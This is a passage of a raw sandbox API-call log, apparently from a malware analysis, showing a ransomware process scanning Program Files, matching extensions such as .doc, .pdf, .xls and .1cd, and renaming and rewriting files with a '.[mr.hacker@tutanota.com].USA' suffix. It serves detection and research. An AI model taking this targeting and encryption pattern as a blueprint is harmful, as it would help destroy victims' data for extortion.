dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.620] lstrlenW (lpString=".doc") returned 4 [0265.620] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString=".docx") returned 5 [0265.620] lstrcmpiW (lpString1=".docx", lpString2="e.bmp") returned -1 [0265.620] lstrlenW (lpString=".pdf") returned 4 [0265.620] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString=".xls") returned 4 [0265.620] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString=".xlsx") returned 5 [0265.620] lstrcmpiW (lpString1=".xlsx", lpString2="e.bmp") returned -1 [0265.620] lstrlenW (lpString=".ppt") returned 4 [0265.620] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.620] lstrlenW (lpString=".zip") returned 4 [0265.620] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString=".rar") returned 4 [0265.620] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString=".bz2") returned 4 [0265.620] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString=".7z") returned 3 [0265.620] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0265.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.620] lstrlenW (lpString=".dbf") returned 4 [0265.620] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0265.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.620] lstrlenW (lpString=".1cd") returned 4 [0265.620] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0265.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.620] lstrlenW (lpString=".jpg") returned 4 [0265.621] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.621] lstrlenW (lpString=".doc") returned 4 [0265.621] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString=".docx") returned 5 [0265.621] lstrcmpiW (lpString1=".docx", lpString2="e.bmp") returned -1 [0265.621] lstrlenW (lpString=".pdf") returned 4 [0265.621] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString=".xls") returned 4 [0265.621] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString=".xlsx") returned 5 [0265.621] lstrcmpiW (lpString1=".xlsx", lpString2="e.bmp") returned -1 [0265.621] lstrlenW (lpString=".ppt") returned 4 [0265.621] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.621] lstrlenW (lpString=".zip") returned 4 [0265.621] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString=".rar") returned 4 [0265.621] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString=".bz2") returned 4 [0265.621] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0265.621] lstrlenW (lpString=".7z") returned 3 [0265.621] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0265.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.621] lstrlenW (lpString=".dbf") returned 4 [0265.621] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0265.622] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.622] lstrlenW (lpString=".1cd") returned 4 [0265.622] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0265.622] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 62 [0265.622] lstrlenW (lpString=".jpg") returned 4 [0265.622] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0265.622] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.622] lstrlenW (lpString="circleround_glass.png") returned 21 [0265.622] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.624] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=27281) returned 1 [0265.624] CloseHandle (hObject=0x2a8) returned 1 [0265.624] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png")) returned 0x20 [0265.624] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.624] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.624] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.624] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.624] lstrlenW (lpString=".doc") returned 4 [0265.624] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.625] lstrlenW (lpString=".docx") returned 5 [0265.625] lstrcmpiW (lpString1=".docx", lpString2="s.png") returned -1 [0265.625] lstrlenW (lpString=".pdf") returned 4 [0265.625] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.625] lstrlenW (lpString=".xls") returned 4 [0265.625] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.625] lstrlenW (lpString=".xlsx") returned 5 [0265.625] lstrcmpiW (lpString1=".xlsx", lpString2="s.png") returned -1 [0265.625] lstrlenW (lpString=".ppt") returned 4 [0265.625] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.625] lstrlenW (lpString=".zip") returned 4 [0265.625] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.625] lstrlenW (lpString=".rar") returned 4 [0265.625] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.625] lstrlenW (lpString=".bz2") returned 4 [0265.625] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.625] lstrlenW (lpString=".7z") returned 3 [0265.625] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.625] lstrlenW (lpString=".dbf") returned 4 [0265.625] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.625] lstrlenW (lpString=".1cd") returned 4 [0265.625] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.625] lstrlenW (lpString=".jpg") returned 4 [0265.625] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.626] lstrlenW (lpString=".doc") returned 4 [0265.626] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.626] lstrlenW (lpString=".docx") returned 5 [0265.626] lstrcmpiW (lpString1=".docx", lpString2="s.png") returned -1 [0265.626] lstrlenW (lpString=".pdf") returned 4 [0265.626] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.626] lstrlenW (lpString=".xls") returned 4 [0265.626] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.626] lstrlenW (lpString=".xlsx") returned 5 [0265.626] lstrcmpiW (lpString1=".xlsx", lpString2="s.png") returned -1 [0265.626] lstrlenW (lpString=".ppt") returned 4 [0265.626] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.626] lstrlenW (lpString=".zip") returned 4 [0265.626] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.626] lstrlenW (lpString=".rar") returned 4 [0265.626] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.626] lstrlenW (lpString=".bz2") returned 4 [0265.626] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.626] lstrlenW (lpString=".7z") returned 3 [0265.626] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.626] lstrlenW (lpString=".dbf") returned 4 [0265.626] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.626] lstrlenW (lpString=".1cd") returned 4 [0265.626] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 65 [0265.626] lstrlenW (lpString=".jpg") returned 4 [0265.626] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.627] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.627] lstrlenW (lpString="circleround_selectionsubpicture.png") returned 35 [0265.627] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.627] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=3878) returned 1 [0265.627] CloseHandle (hObject=0x2a8) returned 1 [0265.627] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png")) returned 0x20 [0265.628] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.628] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.628] lstrlenW (lpString=".doc") returned 4 [0265.628] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.628] lstrlenW (lpString=".docx") returned 5 [0265.628] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0265.628] lstrlenW (lpString=".pdf") returned 4 [0265.628] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.628] lstrlenW (lpString=".xls") returned 4 [0265.628] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.628] lstrlenW (lpString=".xlsx") returned 5 [0265.628] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0265.628] lstrlenW (lpString=".ppt") returned 4 [0265.628] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.628] lstrlenW (lpString=".zip") returned 4 [0265.628] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.628] lstrlenW (lpString=".rar") returned 4 [0265.628] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.628] lstrlenW (lpString=".bz2") returned 4 [0265.628] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.628] lstrlenW (lpString=".7z") returned 3 [0265.628] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.628] lstrlenW (lpString=".dbf") returned 4 [0265.629] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.629] lstrlenW (lpString=".1cd") returned 4 [0265.629] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.629] lstrlenW (lpString=".jpg") returned 4 [0265.629] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.629] lstrlenW (lpString=".doc") returned 4 [0265.629] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.629] lstrlenW (lpString=".docx") returned 5 [0265.629] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0265.629] lstrlenW (lpString=".pdf") returned 4 [0265.629] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.629] lstrlenW (lpString=".xls") returned 4 [0265.629] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.629] lstrlenW (lpString=".xlsx") returned 5 [0265.629] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0265.629] lstrlenW (lpString=".ppt") returned 4 [0265.629] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.629] lstrlenW (lpString=".zip") returned 4 [0265.629] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.629] lstrlenW (lpString=".rar") returned 4 [0265.629] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.629] lstrlenW (lpString=".bz2") returned 4 [0265.629] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.629] lstrlenW (lpString=".7z") returned 3 [0265.630] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.630] lstrlenW (lpString=".dbf") returned 4 [0265.630] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.630] lstrlenW (lpString=".1cd") returned 4 [0265.630] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 79 [0265.630] lstrlenW (lpString=".jpg") returned 4 [0265.630] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.630] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.630] lstrlenW (lpString="circleround_videoinset.png") returned 26 [0265.630] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.630] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5059) returned 1 [0265.630] CloseHandle (hObject=0x2a8) returned 1 [0265.630] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png")) returned 0x20 [0265.631] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.631] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 70 [0265.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 70 [0265.631] lstrlenW (lpString=".doc") returned 4 [0265.631] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.631] lstrlenW (lpString=".docx") returned 5 [0265.631] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1 [0265.631] lstrlenW (lpString=".pdf") returned 4 [0265.631] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.631] lstrlenW (lpString=".xls") returned 4 [0265.631] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.631] lstrlenW (lpString=".xlsx") returned 5 [0265.631] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1 [0265.631] lstrlenW (lpString=".ppt") returned 4 [0265.631] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 70 [0265.631] lstrlenW (lpString=".zip") returned 4 [0265.631] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.631] lstrlenW (lpString=".rar") returned 4 [0265.631] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.631] lstrlenW (lpString=".bz2") returned 4 [0265.631] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.631] lstrlenW (lpString=".7z") returned 3 [0265.631] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.632] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 70 [0266.507] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.507] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.507] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.508] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.509] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.509] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.509] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.510] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.512] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0266.512] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0267.109] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.109] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0267.117] GetLastError () returned 0x0 [0267.117] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1c08, lpOverlapped=0x0) returned 1 [0267.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1c10, lpOverlapped=0x0) returned 1 [0267.122] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, 